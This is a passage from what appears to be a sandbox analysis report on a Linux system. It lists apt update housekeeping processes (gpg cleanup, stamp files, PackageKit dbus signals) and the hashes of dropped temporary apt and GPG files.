/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1979

/bin/rm
rm -rf /tmp/apt-key-gpghome.PUWKEmdlgl
2⤵
PID:1980

/usr/bin/sort
sort
1⤵
PID:1955

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1971

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1974

/bin/sh
sh -c "touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true"
1⤵
PID:1982

/usr/bin/touch
touch /var/lib/apt/periodic/update-success-stamp
2⤵
PID:1983

/bin/sh
sh -c "[ ! -f /var/run/dbus/system_bus_socket ] || /usr/bin/dbus-send --system --dest=org.debian.apt --type=signal /org/debian/apt org.debian.apt.CacheChanged || true"
1⤵
PID:1984

/bin/sh
sh -c "/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
1⤵
PID:1985

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh
Filesize
82B

MD5
403a4592b82d52a228ca10bed2201abc

SHA1
db160c47ed228350fa98b455e69fa02f5f91962c

SHA256
d5d5696d70f2da5bf739adcdbd225a13a07533d6bd936aaaf246387d56f02d9a

SHA512
4e54ce7dc402757af5c342358922edfd2dcc3892fbe04fb8a44b267169bceadb57b511b34fe2c8b96ba838d455d5b06e8a65abd778b08760bee3836e1333e924

Download Submit
/tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh
Filesize
82B

MD5
b0d16da085e293d5d8c5f582e8f156e3

SHA1
59e10f99212483f624727be2fa9d3afc68e3486a

SHA256
4aeeb9c248aa4476f6bb319b45431cb270fd3120a63a15147116959d082920f2

SHA512
1a7a1278d88a7b6f7bf338dda4ed156b23062be48b107369ebfc87f63f4a633e9c8a9a592846afd495bc268de6fbbf73e9c8391d15e8d0475f8e5fe9179491f7

Download Submit
/tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh
Filesize
82B

MD5
cb8e8f56a0d49d6f8a7ad8c795f596f4

SHA1
f18ae53a8e0c4e0da9bc80a1a5b59d8356e789ae

SHA256
339ad0c85d47f1e1c56c6260bfcfce8e0278e9d276c59412eba3116cc83f69ec

SHA512
f652d8513e8621707acab2b459fecb71deb9609772d0809a234758ce12ce74a59ab1a8e3e523fa1f078a336dc01e7d74e1d155e9d16430d693fde8a4c99dfbee

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh
Filesize
82B

MD5
b591c1d33b54b65eeac2381d7c36886a

SHA1
e28b9336eca298cf906eeb278f464b7b1d7e8d3e

SHA256
a2e0fe3ae466856476c34f437c2ed30e60ce345102be2ac9929486f632ae5f8f

SHA512
1ea555ca561598e6d4104261b42315f3c4ea6b243bc0ac0c71af758391b5ddc70f6b6eff46ad54498e9d098b965a04387434d062e0029e2b5ce50871dbea7309

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
Filesize
7KB

MD5
b3bf35c5e796db394a50f96b908b690f

SHA1
b1e90de4d9d88bac6c67926c0ff6263e3ef7c2d2

SHA256
cf419d6c58bea5f2586043ecbad4c44f27d6f6060e5be19993b857105a5be094

SHA512
a97f8881c83ddc681623e4f503f8f758afe85ae6c34e2339a635e9521ae1303aebb90a6bef7c1136b6bd2b7418facacf98643f24e8bb40f1f93fb8a8ef714a96

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
Filesize
2KB

MD5
79650cd189f35a29603fc43202d399ad

SHA1
e3bdd5aec56b59d5eaff3f60caf46a6786fc7ff8

SHA256
5321d780da31a1fa35c044470ef849a2f6244048855fdc4c22e527b6366a0ef7

SHA512
34bad6f9713c5837d3139dcb3a49239373fe5c242f31c3ca539888d16c2d5e63074c806e700553bdf9b6879e3c2b48c835a900df4ff8dfa96afd041d2357733e

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
Filesize
5KB

MD5
34aa70714b28c0918716b6ce3bdb945e

SHA1
5c7cd1296bc98e2ea0e221beb45f8cbe65dd3016

SHA256
30ffc1b01e43be791a595d5125e9ce283b206ca8dd299ea2149ee01d7a39895e

SHA512
f06340e985e01e7aa3a03dc662f4a084c835f0a39e3af40616851d80bfc5948786cf10a403811fb5c46a98f949e7cfdfc1bb481a5bdfda9376812566dc55140d

Download Submit
/tmp/apt.conf.g9ukqV
Filesize
13KB

MD5
a76061c3ab255e6b8d43815d276645be

SHA1
1efc38e5870ed9949fff954f47719fa8da39a70e

SHA256
9f3c5a98f42457279978d5c118a086b807967da9c9e9d8035a373a5df2d65288

SHA512
507182a74e6b4b5c25fb0741f6340aa5b8c752f41e0b3d0a8516349ae920f89f09fa2cb0a176fa66723d30500b2db6e91fa49ba97a69a18db8a1315434e93b40

Download Submit
/tmp/apt.data.73Fbeh
Filesize
85KB

MD5
1ee010b9e38ce7b0e70d0dfac2432a4d

SHA1
b5c03f220b5d0eece5da779b22b45763ac3f6fb5

SHA256
a148097b718116bec532f9b29d7cc18aaf0fb279c7d85091aa53a6e73be8863d

SHA512
aa79f520dac67935dd65ed5b1a1375d14df6e9f87a2860f5c581fc03a402f81aee9e1cdcb19bb611838568f1cf47ddcc053f41ed15f473a6bb7ffd055849d5eb

Download Submit
/tmp/apt.sig.XyhbkB
Filesize
833B

MD5
505ad9cd17d5c5c86e48ebbcbe5a259a

SHA1
d3e0b35b616a911dad7e1e78739d34e2b779f3e4

SHA256
6311ed6f53ffdfbd0c9599216285e5b5e1d4c74af4fa070c8779313aa0a839e0

SHA512
aed9d837ffda0ddd33357a96722bf896b155394c8bcf183f9b9d1485f548e11304acaa35edf06121bd04a010dfe2fccfb6d9e8d39e5f166af83beb2488753d0b

Download Submit
/tmp/fileutl.message.c0t5Gs
Filesize
180KB

MD5
36c4be31b7662eadfa1132e3ec2e2586

SHA1
e67d5569615386744405b7eb29ea0b0208ad3bd6

SHA256
9fb26a1277a567b5f604484ec506a363091b148570c0e522487aa4af4a9a796d

SHA512
3d546bfd46566f86b40d25b8b126b836c3ed0da22e4bfda88148a98ab48d596f0a644f3b1e49c23f4bf05e2448452b961a65bf26896c9850331144d48d68b184

Download Submit
memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp

Download